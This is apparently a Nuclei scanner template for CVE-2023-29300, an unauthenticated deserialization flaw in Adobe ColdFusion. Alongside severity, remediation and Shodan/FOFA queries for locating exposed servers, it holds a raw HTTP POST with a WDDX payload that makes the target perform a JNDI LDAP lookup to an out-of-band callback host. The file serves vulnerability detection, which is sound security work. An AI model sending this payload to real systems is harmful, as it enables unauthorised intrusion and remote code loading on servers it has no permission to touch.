nuclei-templates/http/cves/2023/CVE-2023-29300.yaml

48 lines
1.9 KiB
YAML
Raw Normal View History

id: CVE-2023-29300
info:
name: Adobe ColdFusion - Pre-Auth Remote Code Execution
author: rootxharsh,iamnoooob,pdresearch
severity: critical
description: |
Adobe ColdFusion versions 2018u16 (and earlier), 2021u6 (and earlier) and 2023.0.0.330468 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.
2023-09-06 11:43:37 +00:00
remediation: |
Upgrade to Adobe ColdFusion version 2023.0.0.328155 or later to mitigate this vulnerability.
reference:
- https://blog.projectdiscovery.io/adobe-coldfusion-rce/
- https://helpx.adobe.com/security/products/coldfusion/apsb23-40.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
2023-08-31 11:46:18 +00:00
cve-id: CVE-2023-29300
cwe-id: CWE-502
2023-10-14 11:27:55 +00:00
epss-score: 0.60087
epss-percentile: 0.97383
2023-09-06 11:43:37 +00:00
cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: adobe
2023-09-06 11:43:37 +00:00
product: coldfusion
shodan-query: http.component:"Adobe ColdFusion"
fofa-query: app="Adobe-ColdFusion"
tags: cve,cve2023,adobe,rce,coldfusion,deserialization
variables:
callback: "{{interactsh-url}}"
jndi: "ldap%3a//{{callback}}/rcrzfd"
http:
- raw:
- |
POST ///CFIDE/adminapi/accessmanager.cfc?method=foo&_cfclient=true HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
argumentCollection=<wddxPacket+version%3d'1.0'><header/><data><struct+type%3d'xcom.sun.rowset.JdbcRowSetImplx'><var+name%3d'dataSourceName'><string>{{jndi}}</string></var><var+name%3d'autoCommit'><boolean+value%3d'true'/></var></struct></data></wddxPacket>
matchers:
- type: dsl
dsl:
- contains(interactsh_protocol, "dns")
- contains(body, "ColdFusion documentation")
condition: and